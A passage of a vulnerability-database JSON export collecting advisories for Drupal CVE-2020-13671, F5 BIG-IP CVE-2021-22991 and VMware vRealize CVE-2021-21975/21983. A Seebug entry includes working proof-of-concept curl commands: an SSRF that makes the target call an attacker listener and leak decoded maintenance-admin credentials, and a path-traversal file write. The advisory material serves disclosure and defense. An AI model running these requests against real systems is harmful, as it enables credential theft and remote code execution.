This issue affects: Drupal Drupal Core 9.0 versions prior to 9.0.8, 8.9 versions prior to 8.9.9, 8.8 versions prior to 8.8.11, and 7 versions prior to 7.74.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-20T16:15:00", "type": "debiancve", "title": "CVE-2020-13671", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2020-11-20T16:15:00", "id": "DEBIANCVE:CVE-2020-13671", "href": "https://security-tracker.debian.org/tracker/CVE-2020-13671", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "drupal": [{"lastseen": "2023-06-03T13:59:55", "description": "Update November 18: Documented longer list of dangerous file extensions Drupal core does not properly sanitize certain filenames on uploaded files, which can lead to files being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting configurations.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-18T00:00:00", "type": "drupal", "title": "Drupal core - Critical - Remote code execution - SA-CORE-2020-012\n", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2020-11-18T00:00:00", "id": "DRUPAL-SA-CORE-2020-012", "href": "https://www.drupal.org/sa-core-2020-012", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-06-05T13:35:16", "description": "Drupal core does not properly sanitize certain filenames on uploaded files,\nwhich can lead to files being interpreted as the incorrect extension and\nserved as the wrong MIME type or executed as PHP for certain hosting\nconfigurations. 
This issue affects: Drupal Drupal Core 9.0 versions prior\nto 9.0.8, 8.9 versions prior to 8.9.9, 8.8 versions prior to 8.8.11, and 7\nversions prior to 7.74.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-20T00:00:00", "type": "ubuntucve", "title": "CVE-2020-13671", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2020-11-20T00:00:00", "id": "UB:CVE-2020-13671", "href": "https://ubuntu.com/security/CVE-2020-13671", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "alpinelinux": [{"lastseen": "2023-06-06T13:03:47", "description": "Drupal core does not properly sanitize certain filenames on uploaded files, which can lead to files being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting configurations. 
This issue affects: Drupal Drupal Core 9.0 versions prior to 9.0.8, 8.9 versions prior to 8.9.9, 8.8 versions prior to 8.8.11, and 7 versions prior to 7.74.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-06T13:03:41", "type": "alpinelinux", "title": "CVE-2020-13671", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2023-06-06T13:03:41", "id": "ALPINE:CVE-2020-13671", "href": "https://security.alpinelinux.org/vuln/CVE-2020-13671", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2023-02-08T16:55:31", "description": "Undisclosed requests to a virtual server may be incorrectly handled by Traffic Management Microkernel (TMM) URI normalization, which may trigger a buffer overflow, resulting in a DoS attack. In certain situations, it theoretically may allow bypass of URL based access control or remote code execution (RCE). 
([CVE-2021-22991](<https://vulners.com/cve/CVE-2021-22991>))\n\n**Note**: This vulnerability is mostly exposed on the data plane via virtual server with the vulnerable configuration; however, it can also be exposed on the control plane via URL Categorization lookup command invoked by an authenticated user with TMOS Shell (**tmsh**) access. Exploitation can lead to complete system compromise.\n\nImpact\n\nThis vulnerability affects systems with one or more of the following configurations.\n\nAffected configurations\n\nBIG-IP APM\n\nThis vulnerability affects a virtual server associated with a BIG-IP APM profile. All BIG-IP APM use cases are vulnerable.\n\nBIG-IP ASM\n\nThis vulnerability affects only BIG-IP ASM Risk Engine use cases. BIG-IP ASM Risk Engine is currently available only to Early Access customers and requires a special license.\n\nBIG-IP PEM\n\nThis vulnerability affects BIG-IP PEM systems that use the following:\n\n * URL filtering with Websense database license activated\n * One or more virtual servers that perform URL categorization and use one of the following: \n * An iRule\n * A local traffic policy\n * A BIG-IP PEM policy\n\nSecure Web Gateway\n\nThis vulnerability affects all F5 Secure Web Gateway use cases. URL categorization is fundamental to the operation of the Secure Web Gateway. 
The Secure Web Gateway requires a separate subscription.\n\nSSL Orchestrator\n\nThis vulnerability affects all systems that use the SSL Orchestrator Categorization macro.\n\nBIG-IP (all modules)\n\nThis vulnerability affects all BIG-IP system modules that use one or more of the following configurations:\n\n * URL filtering with Websense database license activated\n * A virtual server associated with an HTTP profile and a local traffic policy with a rule condition that has the following options enabled: **HTTP URI** or **HTTP Referer** and **Use normalized URI**\n\n**Note**: The **Use normalized URI** option is disabled by default.\n\nFor more information about HTTP profiles and local traffic policy rules, refer to [K40243113: Overview of the HTTP profile](<https://support.f5.com/csp/article/K40243113>) and [K04597703: Overview of the Local Traffic Policies feature (12.1.0 and later)](<https://support.f5.com/csp/article/K04597703>) respectively.\n\nFor example, in the following configuration, the local traffic policy is vulnerable:\n\nltm policy /Common/K56715231 { \n requires { http http-connect } \n rules { \n VULN_RULE01 { \n conditions { \n 0 { \n _http-uri_ \n proxy-connect \n _normalized_ \n values { VULN_URI_STRING } \n } \n } \n } \n VULN_RULE02 { \n conditions { \n 0 { \n _http-referer_ \n proxy-connect \n _normalized_ \n values { VULN_REF_STRING } \n } \n } \n ordinal 1 \n } \n } \n strategy /Common/first-match \n}\n\n * A virtual server associated with an HTTP profile and an iRule that uses any of the following commands with the **-normalized** switch: \n * HTTP::uri\n * HTTP::query\n * HTTP::path\n\nFor example, the following iRule is vulnerable:\n\nwhen HTTP_REQUEST { \n if { ([HTTP::uri -normalized] starts_with "/vulnerable")} { \n log local0.error "K56715231 URI example" \n } elseif { ([HTTP::query -normalized] starts_with "/vulnerable")} { \n log local0.error "K56715231 Query example" \n } elseif { ([HTTP::path -normalized] starts_with 
"/vulnerable")} { \n log local0.error "K56715231 Path example" \n } \n } \n\nIdentify whether your system has URL filtering with Websense database license activated\n\nYou can identify whether your BIG-IP system has URL filtering with Websense database license activated by checking the **/var/log/tmm** log file during restart. When you have this feature, you see a log entry similar to the following:\n\ntmm:<13> Apr 8 02:34:05 bigip.local notice URLCAT_LIB: urlcat_websense_license_callback/984: WEBSENSE DB is licensed\n\nThis log entry only displays when you set the BIG-IP system database variable **tmm.lib.urlcat.log.level** to **Debug**.\n\n**Note**: If you believe your system is compromised, refer to [K11438344: Considerations and guidance when you suspect a security compromise on a BIG-IP system](<https://support.f5.com/csp/article/K11438344>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-10T14:51:00", "type": "f5", "title": "TMM buffer-overflow vulnerability CVE-2021-22991", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22991", "CVE-2021-23007"], "modified": 
"2021-07-08T02:56:00", "id": "F5:K56715231", "href": "https://support.f5.com/csp/article/K56715231", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2021-07-24T15:55:32", "description": "# Description\n\nOn March 30, 2021, VMware published a [security advisory](https://www.vmware.com/security/advisories/VMSA-2021-0004.html) for [CVE-2021-21975](https://nvd.nist.gov/vuln/detail/CVE-2021-21975) and [CVE-2021-21983](https://nvd.nist.gov/vuln/detail/CVE-2021-21983), two chainable vulnerabilities in its vRealize Operations Manager product. CVE-2021-21975 is an unauthenticated server-side request forgery (SSRF), while CVE-2021-21983 is an authenticated arbitrary file write. Successfully chaining both vulnerabilities achieves unauthenticated remote code execution (RCE) in vRealize Operations Manager and any product using it as a component.\n\nAt the time of public disclosure, Positive Technologies [tweeted](https://twitter.com/ptswarm/status/1376961747232382976) about CVE-2021-21975 and CVE-2021-21983, which were both discovered by their researcher [Egor Dimitrenko](https://twitter.com/elk0kc).\n\n# Affected products\n\n- vRealize Operations Manager\n - 7.0.0\n - 7.5.0\n - 8.0.0, 8.0.1\n - 8.1.0, 8.1.1\n - 8.2.0\n - 8.3.0\n- VMware Cloud Foundation (vROps)\n - 3.x\n - 4.x\n- vRealize Suite Lifecycle Manager (vROps)\n - 8.x\n\n# Technical analysis\n\nCVE-2021-21975 is the primary focus of this analysis.\n\n## CVE-2021-21975 (SSRF)\n\n`/nodes/thumbprints` (mapped to `/casa/nodes/thumbprints`) is an unauthenticated endpoint.\n\n```\n <sec:http pattern=\"/nodes/thumbprints\" security='none'/>\n```\n\nIt accepts a `POST` request whose body is a JSON array of network address strings.\n\n```\n @RequestMapping(value = {\"/nodes/thumbprints\"}, method = {RequestMethod.POST})\n @ResponseStatus(HttpStatus.OK)\n public ArrayList<ThumbprintResource> getNodesThumbprints(@RequestBody String[] addresses) {\n return 
this.clusterDefService.getNodesThumbprints(new HashSet(Arrays.asList((Object[])addresses)));\n }\n```\n\nEach address is sent a crafted `GET` request, leading to a partially controlled SSRF.\n\n```\n public ArrayList<ThumbprintResource> getNodesThumbprints(Set<String> addresses) {\n ArrayList<ThumbprintResource> ipToThumbprint = new ArrayList<>();\n if (null == addresses) {\n return ipToThumbprint;\n }\n configureInsecurRestTemplate();\n\n HttpMapFunction f = new HttpMapFunction(addresses.<String>toArray(new String[addresses.size()]), RequestMethod.GET, \"/node/thumbprint\", null, null, this.webappInfo, this.timeoutForGetRequest, this.restTemplate);\n\n\n\n\n\n\n\n\n HttpMapResponse[] responses = f.execute();\n\n for (HttpMapResponse resp : responses) {\n if (resp.getHttpCode() == HttpStatus.OK.value()) {\n String data = resp.getDocument().replace('\"', ' ').trim();\n ipToThumbprint.add(new ThumbprintResource(resp.getSliceAddress(), data));\n } else {\n ipToThumbprint.add(new ThumbprintResource(resp.getSliceAddress(), null));\n }\n }\n\n return ipToThumbprint;\n }\n```\n\n### PoC\n\nThe [provided workaround](https://kb.vmware.com/s/article/83210) provided enough information to develop a PoC.\n\n```\nwvu@kharak:~$ curl -k https://192.168.123.185/casa/nodes/thumbprints -H \"Content-Type: application/json\" -d '[\"192.168.123.1:8443/#\"]'\n```\n\nAppending `#` (presumably [URI fragment syntax](https://en.wikipedia.org/wiki/URI_fragment)) to the SSRF URI allows for full control of the `GET` request path.\n\n```\nwvu@kharak:~$ ncat -lkv --ssl 8443\nNcat: Version 7.91 ( https://nmap.org/ncat )\nNcat: Generating a temporary 2048-bit RSA key. 
Use --ssl-key and --ssl-cert to use a permanent one.\nNcat: SHA-1 fingerprint: DD68 63E6 C329 1851 F74F 797A F684 7823 207A 55E7\nNcat: Listening on :::8443\nNcat: Listening on 0.0.0.0:8443\nNcat: Connection from 192.168.123.185.\nNcat: Connection from 192.168.123.185:36070.\nGET / HTTP/1.1\nAccept: application/xml, application/json\nContent-Type: application/json\nAccept-Charset: big5, big5-hkscs, cesu-8, euc-jp, euc-kr, gb18030, gb2312, gbk, ibm-thai, ibm00858, ibm01140, ibm01141, ibm01142, ibm01143, ibm01144, ibm01145, ibm01146, ibm01147, ibm01148, ibm01149, ibm037, ibm1026, ibm1047, ibm273, ibm277, ibm278, ibm280, ibm284, ibm285, ibm290, ibm297, ibm420, ibm424, ibm437, ibm500, ibm775, ibm850, ibm852, ibm855, ibm857, ibm860, ibm861, ibm862, ibm863, ibm864, ibm865, ibm866, ibm868, ibm869, ibm870, ibm871, ibm918, iso-2022-cn, iso-2022-jp, iso-2022-jp-2, iso-2022-kr, iso-8859-1, iso-8859-13, iso-8859-15, iso-8859-2, iso-8859-3, iso-8859-4, iso-8859-5, iso-8859-6, iso-8859-7, iso-8859-8, iso-8859-9, jis_x0201, jis_x0212-1990, koi8-r, koi8-u, shift_jis, tis-620, us-ascii, utf-16, utf-16be, utf-16le, utf-32, utf-32be, utf-32le, utf-8, windows-1250, windows-1251, windows-1252, windows-1253, windows-1254, windows-1255, windows-1256, windows-1257, windows-1258, windows-31j, x-big5-hkscs-2001, x-big5-solaris, x-compound_text, x-euc-jp-linux, x-euc-tw, x-eucjp-open, x-ibm1006, x-ibm1025, x-ibm1046, x-ibm1097, x-ibm1098, x-ibm1112, x-ibm1122, x-ibm1123, x-ibm1124, x-ibm1166, x-ibm1364, x-ibm1381, x-ibm1383, x-ibm300, x-ibm33722, x-ibm737, x-ibm833, x-ibm834, x-ibm856, x-ibm874, x-ibm875, x-ibm921, x-ibm922, x-ibm930, x-ibm933, x-ibm935, x-ibm937, x-ibm939, x-ibm942, x-ibm942c, x-ibm943, x-ibm943c, x-ibm948, x-ibm949, x-ibm949c, x-ibm950, x-ibm964, x-ibm970, x-iscii91, x-iso-2022-cn-cns, x-iso-2022-cn-gb, x-iso-8859-11, x-jis0208, x-jisautodetect, x-johab, x-macarabic, x-maccentraleurope, x-maccroatian, x-maccyrillic, x-macdingbat, x-macgreek, x-machebrew, x-maciceland, 
x-macroman, x-macromania, x-macsymbol, x-macthai, x-macturkish, x-macukraine, x-ms932_0213, x-ms950-hkscs, x-ms950-hkscs-xp, x-mswin-936, x-pck, x-sjis_0213, x-utf-16le-bom, x-utf-32be-bom, x-utf-32le-bom, x-windows-50220, x-windows-50221, x-windows-874, x-windows-949, x-windows-950, x-windows-iso2022jp\nX-VSCM-Request-Id: ak00003Y\nAuthorization: Basic bWFpbnRlbmFuY2VBZG1pbjpSZmRzeEsvNU00TVNrMnNpMTc0S0loRFY=\nCache-Control: no-cache\nPragma: no-cache\nUser-Agent: Java/1.8.0_212\nHost: 192.168.123.1:8443\nConnection: keep-alive\n```\n\nNote the `Authorization: Basic` header, which is present in older vulnerable versions but missing from 8.3.0. The Base64 `bWFpbnRlbmFuY2VBZG1pbjpSZmRzeEsvNU00TVNrMnNpMTc0S0loRFY=` decodes to the credentials `maintenanceAdmin:RfdsxK/5M4MSk2si174KIhDV`.\n\n## CVE-2021-21983 (file write)\n\nCVE-2021-21983 is a path traversal in the `/casa/private/config/slice/ha/certificate` endpoint.\n\n```\n @RequestMapping(value = {\"/private/config/slice/ha/certificate\"}, method = {RequestMethod.POST})\n @ResponseBody\n @ResponseStatus(HttpStatus.OK)\n @Auditable(category = Auditable.Category.CONFIG_SLICE_CERTIFICATE, auditMessage = \"Accepting replicated certificate from Master slice\")\n public void handleCertificateUpload(@RequestParam(\"name\") String name, @RequestParam(\"file\") MultipartFile multiPartFile) {\n try {\n this.certificateService.handleCertificateFile(multiPartFile, name);\n } catch (Exception e) {\n this.log.error(\"Error handling replica certificate upload: {}\", e);\n throw new CasaException(e, \"Failed to upload replica certificate\");\n }\n }\n void handleCertificateFile(MultipartFile multiPartFile, String fileName) {\n+ if (fileName == null || !fileName.equals(\"cakey.pem\")) {\n+ throw new CasaException(\"Wrong cert file name is provided\");\n+ }\n File certFile = new File(this.certDirPath, fileName);\n\n try {\n multiPartFile.transferTo(certFile);\n\n certFile.setExecutable(false, false);\n } catch (Exception e) {\n throw 
new CasaException(\"Error writing Certificate file: \" + certFile.getAbsolutePath(), e);\n }\n }\n```\n\n### PoC\n\n```\nwvu@kharak:~$ curl -kH \"Authorization: Basic bWFpbnRlbmFuY2VBZG1pbjpSZmRzeEsvNU00TVNrMnNpMTc0S0loRFY=\" https://192.168.123.185/casa/private/config/slice/ha/certificate -F name=../../../../../tmp/vulnerable -F \"file=@-; filename=vulnerable\" <<<vulnerable\nwvu@kharak:~$\nroot@vRealizeClusterNode [ /tmp ]# ls -l vulnerable\n-rw-r--r-- 1 admin admin 11 Apr 5 22:18 vulnerable\nroot@vRealizeClusterNode [ /tmp ]# cat vulnerable\nvulnerable\nroot@vRealizeClusterNode [ /tmp ]#\n```\n\n## IOCs\n\nNumerous log files can be found in `/usr/lib/vmware-casa/casa-webapp/logs`. The file `/usr/lib/vmware-casa/casa-webapp/logs/casa.log` is of particular interest for tracking suspicious requests.\n\n```\n2021-04-03 07:58:33,113 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:60 - Request POST /casa/nodes/thumbprints from 192.168.123.1: New request id ak0000BL\n2021-04-03 07:58:33,113 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.HttpMapFunction:325 - execute, hosts=[192.168.123.1:8443/#], op=GET, relativeUrl=/node/thumbprint, doc={}\n2021-04-03 07:58:33,116 [ak0000BL] [pool-36-thread-1] INFO casa.support.HttpTask:128 - Making HTTP call to url=https://192.168.123.1:8443/#/casa/node/thumbprint\n2021-04-03 07:58:33,117 [ak0000BL] [pool-36-thread-1] DEBUG casa.support.CasaRestTemplate:147 - HTTP GET https://192.168.123.1:8443/#/casa/node/thumbprint\n2021-04-03 07:58:33,117 [ak0000BL] [pool-36-thread-1] DEBUG casa.support.CasaRestTemplate:147 - Accept=[text/plain, application/json, application/*+json, */*]\n2021-04-03 07:58:33,117 [ak0000BL] [pool-36-thread-1] DEBUG casa.support.CasaRestTemplate:147 - Writing [{}] as \"application/json\"\n2021-04-03 07:58:33,118 [ak0000BL] [pool-36-thread-1] INFO casa.support.MaintenanceUserUtils:33 - Maintenance User credentials initialized\n2021-04-03 07:58:43,114 
[ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] WARN casa.support.HttpMapFunction:414 - Error retrieving HttpTask future: java.util.concurrent.CancellationException\n2021-04-03 07:58:43,116 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:93 - Request POST /casa/nodes/thumbprints: Done\n2021-04-05 22:18:22,066 [ ] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.security.UsernamePasswordAuthenticator:104 - Authenticated maintenance user 'maintenanceAdmin'\n2021-04-05 22:18:22,066 [ak0002Q9] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:60 - Request POST /casa/private/config/slice/ha/certificate from 192.168.123.1: New request id ak0002Q9\n2021-04-05 22:18:22,067 [ak0002Q9] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:93 - Request POST /casa/private/config/slice/ha/certificate: Done\n```\n\nNote that the SSRF most likely requires a callback address in order to extract the `Authorization: Basic` header and any credentials it contains.\n\n# Guidance\n\nPlease see the **Response Matrix** in the [advisory](https://www.vmware.com/security/advisories/VMSA-2021-0004.html) for fixed versions and workarounds.\n\n# References\n\n- https://www.vmware.com/security/advisories/VMSA-2021-0004.html\n- https://twitter.com/ptswarm/status/1376961747232382976", "cvss3": {}, "published": "2021-03-31T00:00:00", "type": "seebug", "title": "VMware vRealize Operations Manager SSRF\u548c\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\uff08CVE-2021-21975 CVE-2021-21983\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-03-31T00:00:00", "id": "SSV:99173", "href": "https://www.seebug.org/vuldb/ssvid-99173", "sourceData": "", "sourceHref": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2021-07-24T16:14:43", "description": "", "cvss3": {}, "published": "2021-03-12T00:00:00", "type": "seebug", "title": "F5 
Networks \u591a\u4e2a\u6f0f\u6d1e\uff08CVE-2021-22986\u3001CVE-2021-22987\u3001CVE-2021-22988\u3001CVE-2021-22989\u3001CVE-2021-22990\u3001CVE-2021-22991\u3001CVE-2021-22992\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22986", "CVE-2021-22987", "CVE-2021-22988", "CVE-2021-22989", "CVE-2021-22990", "CVE-2021-22991", "CVE-2021-22992"], "modified": "2021-03-12T00:00:00", "id": "SSV:99156", "href": "https://www.seebug.org/vuldb/ssvid-99156", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2021-09-03T02:07:16", "description": "##### **1\\. Impacted Products**\n\n * VMware vRealize Operations \n\n * VMware Cloud Foundation \n\n * vRealize Suite Lifecycle Manager \n\n\n##### **2\\. Introduction**\n\nMultiple vulnerabilities in VMware vRealize Operations were privately reported to VMware. Patches and Workarounds are available to address these vulnerabilities in impacted VMware products. \n\n\n##### **3a. Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975)**\n\n**Description**\n\nThe vRealize Operations Manager API contains a Server Side Request Forgery. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of [8.6](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N>). \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials. \n\n\n**Resolution**\n\nTo remediate CVE-2021-21975 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to impacted deployments. \n\n\n**Workarounds**\n\nWorkarounds for CVE-2021-21975 have been listed in the 'Workarounds' column of the 'Response Matrix' below. 
\n\n\n**Additional Documentation**\n\nA FAQ was created which is listed in the 'Additional Documentation' column of the 'Response Matrix' below.\n\n**Acknowledgements**\n\nVMware would like to thank Egor Dimitrenko of Positive Technologies for reporting this vulnerability to us. \n\n\n##### **3b. Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983)**\n\n**Description**\n\nThe vRealize Operations Manager API contains an arbitrary file write vulnerability. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of [7.2](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>). \n\n\n**Known Attack Vectors**\n\nAn authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system. \n\n\n**Resolution**\n\nTo remediate CVE-2021-21983 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nWorkarounds for CVE-2021-21983 have been listed in the 'Workarounds' column of the 'Response Matrix' below. \n\n\n**Additional Documentation**\n\nA FAQ was created which is listed in the 'Additional Documentation' column of the 'Response Matrix' below. \n\n\n**Acknowledgements**\n\nVMware would like to thank Egor Dimitrenko of Positive Technologies for reporting this vulnerability to us. \n\n\n**Notes**\n\n[1] The hotfixes previously mentioned in this advisory were found to only have partially resolved CVE-2021-21975 leaving a residual risk of moderate severity (CVSS = 4.3). Hotfixes created to resolve the vulnerabilities documented in [VMSA-2021-0018](<https://www.vmware.com/security/advisories/VMSA-2021-0018.html>) also include complete fixes for CVE-2021-21975. 
\n \n[2] vRealize Operations Manager 8.4.0 shipped with the aforementioned incomplete fixes, and is therefore partially impacted by CVE-2021-21975.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-03-30T00:00:00", "type": "vmware", "title": "VMware vRealize Operations updates address Server Side Request Forgery and Arbitrary File Write vulnerabilities (CVE-2021-21975, CVE-2021-21983)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 9.2, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-03-31T00:00:00", "id": "VMSA-2021-0004.1", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0004.1.html", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2023-05-27T15:13:03", "description": "3a. Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) \n\nThe vRealize Operations Manager API contains a Server Side Request Forgery. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of 8.6. \n\n3b. 
